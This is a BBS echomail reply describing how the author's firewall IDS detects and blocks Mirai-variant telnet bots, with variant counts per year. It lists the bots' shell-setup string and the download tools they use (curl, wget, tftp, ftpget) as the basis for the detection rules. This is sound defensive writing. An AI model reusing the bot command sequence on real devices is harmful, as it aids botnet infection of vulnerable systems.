On 2018 Jun 26 15:09:12, you wrote to Sean Dennis:

 NA> If a non-ANSI user calls here, I know that 99% of the time its a
 NA> script-kid. So I added a CAPTCHA; meaning, type the phrase you see. If
 NA> you answer wrong, your IP address is blacklisted in the NET2BBS "kill"
 NA> file. A blacklisted system is trapped and disconnected before the BBS
 NA> loads. I write a seperate process that resets the kill file once a
 NA> week in the case of a false-positive.

that's similar to what i do here except i use an IDS on my firewall... ISP
issued modems are shit... just barely enough to call them a
modem/firewall/router... we use our's in bridge mode and have our own dedicated
 firewall/router machine protecting the three networks here... this firewall
being one of smoothwall, ipfire, pfSense and similar... we chose ours because
we can customize it if we choose... the IDS comes with but the automated
dropping of unwanted connections is our custom addition...

since i have frontdoor running and answering the connection requests on telnet,
 it answers and logs the "DFRS" (data from ring signal)... that should be the
caller-id stuff but on telnet, with these automated mirai variants, they just
spew their credentials and then try to set up their shell... it is because of
frontdoor that i was able to see what was going on... most bbses hide that
data... so anyway, once i knew what was going on, i wrote a few IDS rules to
detect these connections... i followed a few rules, though...

  1. we don't care what name and password they spew.
  2. we DO care if they try to set up their shell.
  3. shell setup is generally always the same
     enable.system.shell.sh
     (dots used for spaces so as to not trip IDS)
  4. after the above they generally try to load busybox
     with some fake module or program call. this call
     is simply a delimeter so they can see when their
     attempt is finished.
  5. sometimes, instead of loading busybox, they try
     to download scripts from somewhere else via tools
     like fgrep, curl, wget, ftpget, tftp, and even echo.

so with the above, we have five IDS rules... one to detect each stage of the
command shell setup attempt... that's really all it takes but we do track the
fake module or program names they try to initiate... that's how the thing got
its name and how the skiddies keep them separated...

in 2016, there were 12 unique variants.
in 2017, there were 30 new unique variants.
in 2018, there have been at least 73 new unique variants.

the most notable thing is that by running the IDS, we're able to detect these
attempts and stop them in the firewall before they even get a chance to get
into the network... sure, the initial part is being feed to the mailer but as
soon as the IDS qualifies the traffic as a mirai variant, it drops the
connection via iptables rules... right now we have rules for each of the unique
 modules which we used as our trigger to block the connection but it is just
about to the point where we don't even care about them any more... we could
drop the connection just based on the attempt to set up the shell which would
reduce our rules set to only 4 rules instead of the current 115 we have in
place...

there used to be a lot more attempts as the skiddies attempted to build their
botnets... those attempts have dropped a lot since the beginning... there's
only maybe 5 unique variants that are active... at least going by what is seen
over here... sometimes an older one will come around and we still see some
mirai attempts... one of the funniest ones is using "anarchy" as their fake
module but the actual funny part is they're trying to load "SH" for their shell
 instead of "sh"... we all know how *nix systems are case sensitive so we know
this won't work but it could be a second round attempt where the first round
may have gotten in and created a "SH" shell... i dunno but i'm glad to be
having my firewall performing this analysis and blocking rather than submitting
 my server to the abuse... that one IDS installation on the firewall is
protecting a number of bbses and they're very happy they don't have to do the
work of analyzing and blocking these skiddie attempts...

at one point in time, our firewall was blocking over 4000 unique IPs that were
known to be infected with a mirai variant... the attempts have fallen off a
whole lot and today we're tracking less than 1000 unique IPs hitting here... i
want to suspect the skids are actually reading their logs and seeing what BBS
and mailer logons look like... i want to suspect they are adjusting their code
to detect those and drop the connection on their own since they can't get in
and do anything... i dunno... maybe it is all just a dream...

)\/(ark

Always Mount a Scratch Monkey
Do you manage your own servers? If you are not running an IDS/IPS yer doin' it
wrong...
... be kind to your four footed friends...
---
 * Origin:  (1:3634/12.73)